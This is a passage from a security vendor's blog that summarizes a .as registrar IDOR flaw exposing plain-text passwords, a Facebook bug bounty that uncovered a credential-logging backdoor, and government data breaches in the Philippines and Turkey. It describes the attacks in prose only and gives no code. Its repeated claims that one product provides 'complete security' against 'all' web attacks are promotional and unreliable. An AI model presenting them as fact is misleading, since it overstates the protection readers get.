Application Security News Updates

Print Friendly, PDF & Email

Flaw Allowed Anyone To Modify & Take Control Over Any .As Domain

A major vulnerability has been discovered in the American Samoa domain registrar’s site (nic.as).

The vulnerability allowed anyone to view the entire domain information for any .as domain – including the plain-text passwords of domain owners, administrative and technical contacts!

The vulnerability was due to Insecure Direct Object Reference – one of the top 10 vulnerabilities that can affect web applications (OWASP Top 10).

The exploit is an example of how insecure coding practices expose sites to very basic malicious actions:

By simply Base64 encoding an .as domain name and appending it to an URL on the nic.as website, it was possible to view the entire domain record for the domain (including unencrypted passwords for domain owners, technical contacts, and billing contacts)

Base64 encoding has been used to obfuscate text, but is extremely simple to reverse and decodeIn this example, any website that is registered in the .as domain could have been easily taken over, leading to a massive loss of business!

Whilst you may not be all that familiar with the .as domain, its use is far reaching! Here are some examples of .as domain owners:

  • Recognizable global brands such as Adidas (a.did.as), Bose (bose.as), Flickr (flickr.as), McDonald’s Australia (macc.as), Opera (oper.as), Twitter (twitter.as), to name but a few all hold .as domains.
  • Large educational establishments such as the University of Texas (utex.as)
  • American Samoa government institutions including the Department of Commerce (doc.as), and the Office of the Governor (gov.as)
  • Link shortening services (such as cbi.as, cort.as and trk.as)
  • Other big businesses/brands who use an .as domain as part of a “domain hack” i.e. to form the name of their business/brand name – for example companies like British Gas (britishg.as)

This site was developed over 16 years ago.  Legacy web applications like this have many of these vulnerabilities.  Fixing the issues is a start, but is frequently quite complex and time consuming, and it is like trying to hit a moving target. A much easier and simpler way is to deploy the Barracuda Web Application Firewall, which protects you against all web application threats. Its URL encryption features ensure that your URL’s are really obfuscated, and not decodable.

This whitepaper (pdf) will provide you with more information on the top 10 web threats and how the Barracuda Web Application Firewall can help you secure against them.

How I Hacked Facebook, and Found Someone's Backdoor Script

OrangeTsai, a student at National Taiwan University of Science and Technology, has been pentesting and participating in bug bounties for years.  In pursuing Facebook's bug bounty program, Orange found a site that Facebook publishes for its internal users.   One he started his testing, he discovered that Facebook was using third party software.   From his article on the incident:

After a simple review, I thought Rapid7 should have already got the easier vulnerabilities. T^T

And the vulnerabilities which needed to be triggered were not easy to exploit. Therefore I need to look deeper!

Finally, I found 7 vulnerabilities, including

  • Cross-Site Scripting x 3
  • Pre-Auth SQL Injection leads to Remote Code Execution
  • Known-Secret-Key leads to Remote Code Execution
  • Local Privilege Escalation x 2

Being the curious type, Tsai dug in further and found some startling evidence – an earlier hacker had compromised the system and was capturing the credentials of everyone who logged into the system!

A brief summary, the hacker created a proxy on the credential page to log the credentials of Facebook employees. These logged passwords were stored under web directory for the hacker to use WGET every once in a while

This episode had a happy ending – the vulnerabilities were disclosed to Facebook and the 3rd party software vendor to be fixed.  Tsai received a $10000 bounty award for his work.

It is common for websites to use 3rd party software, such as WordPress, Drupal, or even proprietary software.  This episode highlights the importance of securing web applications and keeping 3rd party software patched.  Administrators need to spend significant amounts of time keeping track of vulnerabilities and patching them to avoid such breaches. Even in such cases, there is still the possibility that, like in this case, previously unknown vulnerabilities are being exploited.

Or, you could protect your sites with the Barracuda Web Application Firewall. The Barracuda Web Application Firewall provides you with complete web application security, blocking all types of web application attacks. It is easy to deploy and simple to configure and maintain.  And now, with the Barracuda Vulnerability Manager, it is even simpler.

Securing web apps can be complex and time consuming. It is like trying to hit a moving target.Click To Tweet

The Barracuda Vulnerability Manager scans your web applications and finds vulnerabilities in them. The report can then be imported into the Barracuda Web Application Firewall to automatically tune the rules for complete security. 

Data breaches of Government websites in the Philippines and Turkey put millions at risk of identity theft and more

On March 27th, the website of the Commissions of Elections (COMELEC), Philippines was breached. The breach was initially identified by the website home page defacement. Anonymous Philippines has claimed responsibility. The breach had over 75.3 million individual entries on the electoral register, with 54.28M of them being valid voter data. This breach has surpassed the OPM breach in 2015.

In another breach, a database was posted online with the personal information of 49 million people from the Turkish citizenship database.

… the unnamed hacktivist has uploaded a trove of details in a 6.6GB file that claims to hold the first and last names, national identifier numbers, mother and father's first names, gender, city of birth, date of birth, full address, ID registration cities and districts of 49,611,709 Turkish citizens.

Breaches of PII (personally identifiable information) always end up causing a huge impact on the individuals whose information has been leaked. In the case of information from Government or Healthcare sites, the impact is of magnitudes higher. The data is already validated to be complete and true. The completeness of the information allows malicious actors to perform more targeted attacks, with better chances of success.

Barracuda Web Application Firewall can be deployed and configured to secure your website easily with minimal effort. The Barracuda Web Application Firewall provides complete security against all web attacks. It’s built-in Data Loss Prevention features enable you to avoid the leakage of sensitive data through your website.

The Barracuda Web Application Firewall provides security and DDoS protection against automated and targeted attacks.  We offer several deployment options, including physical and virtual appliances, and Azure, AWS, and vCloud Air.  Try it in your environment for 30 days, risk-free.


Tushar Richabadas is a Product Manager for the Barracuda Web Application Firewall team in our India office.  You can connect with him on LinkedIn here.

 

Scroll to top
Tweet
Share
Share